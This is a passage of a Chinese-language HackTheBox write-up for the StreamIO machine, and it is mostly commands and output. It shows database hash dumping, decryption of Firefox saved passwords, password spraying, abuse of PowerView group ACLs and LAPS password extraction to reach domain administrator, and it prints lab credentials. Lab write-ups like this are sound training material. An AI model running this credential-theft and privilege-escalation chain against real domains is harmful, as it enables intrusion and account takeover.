*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\nikk37\Desktop> dir


    Directory: C:\Users\nikk37\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/11/2024   3:44 PM             34 user.txt


*Evil-WinRM* PS C:\Users\nikk37\Desktop> type user.txt
fc07dae5ff5336e78edeb6f239fea3c1
*Evil-WinRM* PS C:\Users\nikk37\Desktop> 

补充：这里放置个演练报告里的方法，他是通过本地查看的

PS C:\> where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE

我无法与 shell 交互地使用它，但我可以使用一些命令行参数在命令行中每次调用时发出单个命令：

-S localhost- 要连接的主机
-U db_admin- 要连接的用户
-P B1@hx31234567890- 用户的密码
-d streamio_backup- 要使用的数据库
-Q [query]- 查询运行然后退出
有两个与主数据库相同的表：

PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
table_name
--------------------------------------------------------------------------------------------------------------------------------
movies
users

(2 rows affected)

PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
id          username                                           password                                          
----------- -------------------------------------------------- --------------------------------------------------
          1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
          2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
          3 James                                              c660060492d9edcaa8332d89c99c9239                  
          4 Theodore                                           925e5408ecb67aea449373d668b7359e                  
          5 Samantha                                           083ffae904143c4796e464dac33c1f7d                  
          6 Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
          7 William                                            d62be0dc82071bccc1322d64ec5b6c51                  
          8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5                  

(8 rows affected)

---------------------------------------------------------------


这里是补充了一下，使用本地的工具进行数据库的查找的过程，而不需要进行端口短发，再使用本地的工具进行登录使用

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:/
*Evil-WinRM* PS C:\> where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
*Evil-WinRM* PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
table_name
--------------------------------------------------------------------------------------------------------------------------------
movies
users

(2 rows affected)
*Evil-WinRM* PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
id          username                                           password
----------- -------------------------------------------------- --------------------------------------------------
          1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a
          2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332
          3 James                                              c660060492d9edcaa8332d89c99c9239
          4 Theodore                                           925e5408ecb67aea449373d668b7359e
          5 Samantha                                           083ffae904143c4796e464dac33c1f7d
          6 Lauren                                             08344b85b329d7efd611b7a7743e8a09
          7 William                                            d62be0dc82071bccc1322d64ec5b6c51
          8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5

(8 rows affected)
*Evil-WinRM* PS C:\> 

0x02 系统权限获取

27、提升了到了用户级别的权限，就开始继续枚举信息了

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> dir C:\"program files (x86)"\


    Directory: C:\program files (x86)


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018  12:28 AM                Common Files
d-----        2/25/2022  11:35 PM                IIS
d-----        2/25/2022  11:38 PM                iis express
d-----        3/28/2022   4:46 PM                Internet Explorer
d-----        2/22/2022   1:54 AM                Microsoft SQL Server
d-----        2/22/2022   1:53 AM                Microsoft.NET
d-----        5/26/2022   4:09 PM                Mozilla Firefox
d-----        5/26/2022   4:09 PM                Mozilla Maintenance Service
d-----        2/25/2022  11:33 PM                PHP
d-----        2/22/2022   2:56 AM                Reference Assemblies
d-----        3/28/2022   4:46 PM                Windows Defender
d-----        3/28/2022   4:46 PM                Windows Mail
d-----        3/28/2022   4:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        3/28/2022   4:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                WindowsPowerShell


*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles> dir


    Directory: C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                5rwivk2l.default
d-----        2/22/2022   2:42 AM                br53rxeg.default-release


*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles> cd 5rwivk2l.default
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\5rwivk2l.default> dir


    Directory: C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\5rwivk2l.default


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/22/2022   2:40 AM             47 times.json


*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\5rwivk2l.default> type times.json
{
"created": 1645526416905,
"firstUse": null
}
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\5rwivk2l.default> cd ../br53rxeg.default-release
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release> dir


    Directory: C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                bookmarkbackups
d-----        2/22/2022   2:40 AM                browser-extension-data
d-----        2/22/2022   2:41 AM                crashes
d-----        2/22/2022   2:42 AM                datareporting
d-----        2/22/2022   2:40 AM                minidumps
d-----        2/22/2022   2:42 AM                saved-telemetry-pings
d-----        2/22/2022   2:40 AM                security_state
d-----        2/22/2022   2:42 AM                sessionstore-backups
d-----        2/22/2022   2:40 AM                storage
-a----        2/22/2022   2:40 AM             24 addons.json
-a----        2/22/2022   2:42 AM           5189 addonStartup.json.lz4
-a----        2/22/2022   2:42 AM            310 AlternateServices.txt
-a----        2/22/2022   2:41 AM         229376 cert9.db
-a----        2/22/2022   2:40 AM            208 compatibility.ini
-a----        2/22/2022   2:40 AM            939 containers.json
-a----        2/22/2022   2:40 AM         229376 content-prefs.sqlite
-a----        2/22/2022   2:40 AM          98304 cookies.sqlite
-a----        2/22/2022   2:40 AM           1081 extension-preferences.json
-a----        2/22/2022   2:40 AM          43726 extensions.json
-a----        2/22/2022   2:42 AM        5242880 favicons.sqlite
-a----        2/22/2022   2:41 AM         262144 formhistory.sqlite
-a----        2/22/2022   2:40 AM            778 handlers.json
-a----        2/22/2022   2:40 AM         294912 key4.db
-a----        2/22/2022   2:41 AM           1593 logins-backup.json
-a----        2/22/2022   2:41 AM           2081 logins.json
-a----        2/22/2022   2:42 AM              0 parent.lock
-a----        2/22/2022   2:42 AM          98304 permissions.sqlite
-a----        2/22/2022   2:40 AM            506 pkcs11.txt
-a----        2/22/2022   2:42 AM        5242880 places.sqlite
-a----        2/22/2022   2:42 AM           8040 prefs.js
-a----        2/22/2022   2:42 AM            180 search.json.mozlz4
-a----        2/22/2022   2:42 AM            288 sessionCheckpoints.json
-a----        2/22/2022   2:42 AM           1853 sessionstore.jsonlz4
-a----        2/22/2022   2:40 AM             18 shield-preference-experiments.json
-a----        2/22/2022   2:42 AM            611 SiteSecurityServiceState.txt
-a----        2/22/2022   2:42 AM           4096 storage.sqlite
-a----        2/22/2022   2:40 AM             50 times.json
-a----        2/22/2022   2:40 AM          98304 webappsstore.sqlite
-a----        2/22/2022   2:42 AM            141 xulstore.json


*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release>


*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release> download logins.json
                                        
Info: Downloading C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json to logins.json
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release> download key4.db
                                        
Info: Downloading C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db to key4.db
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release>

28、这里解密的时候，涉及到Python的3方库存在过期的问题，导致一直提示缺少某个库，修改了下以下代码后，成功解密出来火狐的密码

https://github.com/lclevy/firepwd

from Cryptodome.Cipher import DES3, AES
from Cryptodome.Util.number import long_to_bytes
from Cryptodome.Util.Padding import unpad   

主要修改了上述的三方库的导入。


shiyan@InfoSec firepwd-master % python3 firepwd.py -d ./mozilla_db/
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
       }
     }
   }
   OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
       }
     }
   }
   OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
 }
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

29、这里得到一些密码后，继续进行密码喷洒下

admin
nikk37
yoshihide
JDgodd

JDg0dd1s@d0p3cr3@t0r
n1kk1sd0p3t00:)
paddpadd@12
password@12

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.158 -u users.txt -p password.txt --continue-on-success  
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.11.158    445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         10.10.11.158    445    DC               [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE 

30、但是上面获取的账号，在手工枚举阶段没有发现了什么有效的信息，那就直接域枚举吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamIO.htb -ns 10.10.11.158 -c all --zip
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.158:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.158:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 07M 26S
INFO: Compressing output into 20240412222023_bloodhound.zip

31、登录bloodhund 工具，清理历史数据后，再上传最新的数据发现了存在一个可利用的漏洞

Help: ReadLAPSPassword

CORE小组的成员STAFF@STREAMIO.HTB能够读取由计算机DC上的本地管理员密码解决方案（LAPS）设置的密码。STREAMIO。HTB。

由LAPS管理的计算机的本地管理员密码存储在机密LDAP属性“ms-mcs-AmpPwd”中。

这里也提供了读取的方法：

当计算机的本地管理员帐户凭据由LAPS控制时，可以充分控制计算机对象。本地管理员帐户的明文密码存储在名为ms-Mcs AdmPwd的计算机对象的扩展属性中。

pyLAPS可用于检索LAPS密码：

https://github.com/p0dalirius/pyLAPS

32、那就按照提示开始枚举吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 pyLAPS.py --action get -d "streamIO.htb" -u "JDgodd" -p "JDg0dd1s@d0p3cr3@t0r" --dc-ip 10.10.11.158
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
[+] All done!

33、但是，可能是权限的问题吧，就是获取不到任何一个密码结果，突然想到，是不是我漏了一个环节，我对该组拥有写入权限，但是我当前的账号并不在组里，我需要添加一下。

*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:/
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/12/2024   8:19 AM                Downloads
d-----        2/26/2022  12:51 AM                inetpub
d-----        3/28/2022   4:46 PM                PerfLogs
d-r---        3/28/2022   2:53 PM                Program Files
d-----         5/9/2022   8:36 PM                Program Files (x86)
d-r---        2/22/2022   2:48 AM                Users
d-----         5/9/2022   5:38 PM                Windows


*Evil-WinRM* PS C:\> cd Downloads
*Evil-WinRM* PS C:\Downloads> ls


    Directory: C:\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/12/2024   3:21 AM         181656 lazagne.exe
-a----        4/12/2024   8:22 AM         770279 PowerView.ps1
-a----        4/12/2024   6:55 AM          51712 runascs.exe


*Evil-WinRM* PS C:\Downloads> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Downloads> $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
*Evil-WinRM* PS C:\Downloads> $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword)
*Evil-WinRM* PS C:\Downloads> Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity "streamio\JDgodd" -Cred $cred
*Evil-WinRM* PS C:\Downloads> Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity "streamio\JDgodd" -Cred $cred -Rights All
*Evil-WinRM* PS C:\Downloads> Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'streamio\JDgodd' -Cred $cred
*Evil-WinRM* PS C:\Downloads> Get-DomainGroupMember -Identity 'Core Staff'


GroupDomain             : streamIO.htb
GroupName               : CORE STAFF
GroupDistinguishedName  : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
MemberDomain            : streamIO.htb
MemberName              : JDgodd
MemberDistinguishedName : CN=JDgodd,CN=Users,DC=streamIO,DC=htb
MemberObjectClass       : user
MemberSID               : S-1-5-21-1470860369-1569627196-4264678630-1104



*Evil-WinRM* PS C:\Downloads> 

34、弄好权限后，那就继续开始使用工具进行获取密码

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 pyLAPS.py --action get -d "streamIO.htb" -u "JDgodd" -p "JDg0dd1s@d0p3cr3@t0r" --dc-ip 10.10.11.158
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
  | DC$                  : nn99ur8t[mvtS]
[+] All done!

35、读取最终flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.158 -u administrator -p 'nn99ur8t[mvtS]'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd C:\Users\Martin\desktop\
*Evil-WinRM* PS C:\Users\Martin\desktop> ls


    Directory: C:\Users\Martin\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/12/2024   2:31 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Martin\desktop> type root.txt
8cced4b2dcebb9a0c6120be99831b40e
*Evil-WinRM* PS C:\Users\Martin\desktop> 

36、其他读取方法：

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <DC=streamIO,DC=htb> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd 
#

# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: nn99ur8t[mvtS]

# search reference
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.158 -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] DC\administrator:nn99ur8t[mvtS] STATUS_LOGON_FAILURE 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/474